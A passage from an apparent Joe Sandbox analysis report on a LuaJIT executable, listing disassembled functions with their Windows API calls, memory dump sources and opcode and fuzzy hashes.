                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: \
                                                      • API String ID: 1452528299-2967466578
                                                      • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction ID: 625aef408bef40905ddfcff798e2a580faabab736a25dcfd1c419aeded380914
                                                      • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                      • Instruction Fuzzy Hash: F1511D32A18B8586DB50DB1DE480269B7B0F799BA8F504235EBAD877A8CF7CD541CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAAD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction ID: 8103a084393560bc9e6363e8414953255e8bc5dfb396027e32052b547f330103
                                                      • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                      • Instruction Fuzzy Hash: DDE04820B1830683EB147779588537D92526FA774BF848439D65E4235ACDBDE4488360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E08C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction ID: ca427a9b8f651f4b20a3acb874bfa3b8017ed250ccf65f2a5bda2684e4006037
                                                      • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                      • Instruction Fuzzy Hash: 5CF0F971A29A81C6D720AB18E48471AA760F7997A9F540324F6AD02BECCF7CC1548B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E08BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AllocVirtual
                                                      • String ID:
                                                      • API String ID: 1225938287-0
                                                      • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction ID: 1dc51dcf68838319a2b33029018457f82df6b65ce85c1548f8c065dc042e66c6
                                                      • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                      • Instruction Fuzzy Hash: 1FF01D71A29B81C2D720AB58E44571AB760F7997A9F544324E6AE02BECCF7CC144CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DFB7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-3916222277
                                                      • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction ID: 4ac22cb6566618b0230fd4fb4c694f2cc3ffc29e0fe30ee49adf7b55c1e2874a
                                                      • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                      • Instruction Fuzzy Hash: AD51C636619A8586DB50DB19E08032AB7B0F7DAB94F505136FB8E87B6CCB7DD9418F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC6500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction ID: 0fae9bd28011a154ef0d71ffb09f97b05196ddabda64af19c4cd5b60f0f51e88
                                                      • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                      • Instruction Fuzzy Hash: A451E47291C6C186E7109F28D4443AEBBA0F769B4DF944135E78D47B89CBBCD505CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DE5D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _wcsupr_s
                                                      • String ID: arg
                                                      • API String ID: 600324503-2022414218
                                                      • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction ID: 964c2b85932636d5d4587c1b4715d9573de1325d349280a5b15ae03d2c97bc05
                                                      • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                      • Instruction Fuzzy Hash: 9431493660854186DB20EB1DD44126AB3A0FBDA799F904231F78D8779DDF7DD9018F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                      • API String ID: 2742660187-2031265017
                                                      • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction ID: 488b5f70182ae37e06a043be335de6a91c23a498b7a052fb5570be42aec17de3
                                                      • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                      • Instruction Fuzzy Hash: 98E0D891E0590681FF0467D964401B052109F2A7B9ECC4335FB3C073D88DAC95808220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC69D8 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7B1EC63F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7B1EC6714,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC641A
                                                      • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7B1EC67C7,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC6A43
                                                      • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7B1EC67C7,?,?,?,?,00000000,COMSPEC,?,00007FF7B1EC69AE), ref: 00007FF7B1EC6A8F
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction ID: ff69ede9e22895a3736e41a1ca94d4d949e1cbb502f41f9fca284de32f98e54e
                                                      • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                      • Instruction Fuzzy Hash: 3081C562E0C68285F764AF2DD84017AFAA1EB6A74AFC44036D74E07798DFBDE541C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAB120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction ID: 484ef49fe97208d31739a62a9985799cfcda00b4e5002b8188e3026cbe3dbe35
                                                      • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                      • Instruction Fuzzy Hash: FC51D921B2928185F764BE2D940067AE6C1BF66BADF844331DF6D177DDCEBCE4418620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC6D20 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7B1EB60FF,?,?,COMSPEC,00007FF7B1EB65F2), ref: 00007FF7B1EC6D39
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7B1EB60FF,?,?,COMSPEC,00007FF7B1EB65F2), ref: 00007FF7B1EC6DFD
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free
                                                      • String ID:
                                                      • API String ID: 3328510275-0
                                                      • Opcode ID: f8e312304a874f8c283f2dac22943bf0ad66c413af5a88ef9b261a62e94a3eb2
                                                      • Instruction ID: 28492efe5dc5ad743f00d8607b32fe4cbf9fa0962e3942e58dedaa04c670713d
                                                      • Opcode Fuzzy Hash: f8e312304a874f8c283f2dac22943bf0ad66c413af5a88ef9b261a62e94a3eb2
                                                      • Instruction Fuzzy Hash: 9F217831F1879181E720AF19684002AEA94BB69BD9B884234DF9E63BDDDF7CD452C714
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E8D400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      • Opcode ID: 69d7e1b41e2c0828fab5d9e7da53949391872b7e3787718b944a4a16876bcd8c
                                                      • Instruction ID: 76cd5f395ef12ac52de1a23f34c0bcb32690f01c695ac06c64c0723ffaac3227
                                                      • Opcode Fuzzy Hash: 69d7e1b41e2c0828fab5d9e7da53949391872b7e3787718b944a4a16876bcd8c
                                                      • Instruction Fuzzy Hash: 6C118D10E0818201FB14B7BC545A2F982526FB731AFC90530E70DD6ACBEDDCB8458232
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBD5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7B1EBD50B,?,?,00000000,00007FF7B1EBD5B3,?,?,?,?,?,?,00007FF7B1EAAF6A), ref: 00007FF7B1EBD63E
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7B1EBD50B,?,?,00000000,00007FF7B1EBD5B3,?,?,?,?,?,?,00007FF7B1EAAF6A), ref: 00007FF7B1EBD648
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction ID: 54ed2397fce2f9fbedfb63f5f1916168de5489c8638eb497c4922b680afd3464
                                                      • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                      • Instruction Fuzzy Hash: F4118711F0964341FF54B76D95D027E92926F667AEFC44335EB2E872CDCEECA8448220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E6F080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction ID: a34f96a3b086ca460dddcff1c8e0115eb41eb538f8d42cccd8447051e4558ec7
                                                      • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                      • Instruction Fuzzy Hash: E611FA32A08A45C6D760AB18E494329B3B0F7AA75DFD04232E79E876E8CF7DD545CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF2DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction ID: e6546e566a9dea737f70221b90be8f735ec28dc8b3840ab7a7a5103207cb8484
                                                      • Opcode Fuzzy Hash: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                      • Instruction Fuzzy Hash: 2971F636618B8586CB60DB1AE48036EB7A0F7C9B94F504136EB9D87BA8DE7CD551CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DFCAF0 Relevance: 1.7, APIs: 1, Instructions: 217stringCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID:
                                                      • API String ID: 3418686817-0
                                                      • Opcode ID: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                      • Instruction ID: 96821da557b00de809ff0464802d422f81739609fe04a99fc1cd6d6d15328746
                                                      • Opcode Fuzzy Hash: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
